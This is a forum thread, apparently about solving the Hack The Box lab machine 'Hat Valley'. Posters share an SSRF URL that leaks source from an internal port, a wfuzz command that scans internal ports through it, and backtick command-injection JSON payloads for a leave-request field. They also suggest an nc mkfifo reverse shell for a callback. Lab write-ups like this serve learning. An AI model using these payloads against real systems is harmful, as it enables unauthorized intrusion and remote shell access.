There's a store-status api endpoint that takes params:

import axios from 'axios'
axios.defaults.withCredentials = true
const baseURL = "/api/"
const store_status = (URL) => { const params = {url: {toJSON: () => URL}
return axios.get(baseURL + 'store-status', {params})
.then(response => response.data)
export default {store_status}

maybe deadend tho

connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg

(October 22, 2022, 09:23 PM)wexaley273 Wrote: There is an SSRF that leaks source code http://hat-valley.htb/api/store-status?url=%22http://localhost:3002/%22
Need to abuse the  Exec function and bypass filters

May i ask how did you find port 3002?

(October 22, 2022, 09:41 PM)11231123 Wrote:

(October 22, 2022, 09:23 PM)wexaley273 Wrote: There is an SSRF that leaks source code http://hat-valley.htb/api/store-status?url=%22http://localhost:3002/%22
Need to abuse the  Exec function and bypass filters

May i ask how did you find port 3002?

wfuzz -c -z range,1-65535 --hh 0 -b "token=<COOKIE>" 'http://hat-valley.htb/api/store-status?url="http://localhost:FUZZ/"' 
only port 80,3002,8080 are open from localhost

(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg

{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(

(October 22, 2022, 09:45 PM)pingu27 Wrote:

(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg

{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(

{"reason":"{{{7*7}}`whoami`","start":"21/10/2022","end":"05/11/2022"}
This works :)

(October 22, 2022, 09:45 PM)pingu27 Wrote:

(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg

{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(

only one, `[COMMAND]`

(October 22, 2022, 09:55 PM)GreyEVO Wrote:

(October 22, 2022, 09:45 PM)pingu27 Wrote:

(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg

{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(

only one, `[COMMAND]`

why does the backtick work and why does it give us bash command access. I thought since this is a node.js server, it would js commands which is what I have been trying.

nc mkfifo on revshells works well to get a callback tho

(October 22, 2022, 10:02 PM)sam123 Wrote:

(October 22, 2022, 09:55 PM)GreyEVO Wrote:

(October 22, 2022, 09:45 PM)pingu27 Wrote:

(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg

{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(

only one, `[COMMAND]`

why does the backtick work and why does it give us bash command access. I thought since this is a node.js server, it would js commands which is what I have been trying.

nc mkfifo on revshells works well to get a callback tho

cuz whatever you type in is processed server-side by /bin/sh in crontab to add to a csv file

(October 22, 2022, 09:54 PM)u53r Wrote:

(October 22, 2022, 09:45 PM)pingu27 Wrote:

(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg

{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(

{"reason":"{{{7*7}}`whoami`","start":"21/10/2022","end":"05/11/2022"}
This works :)

GG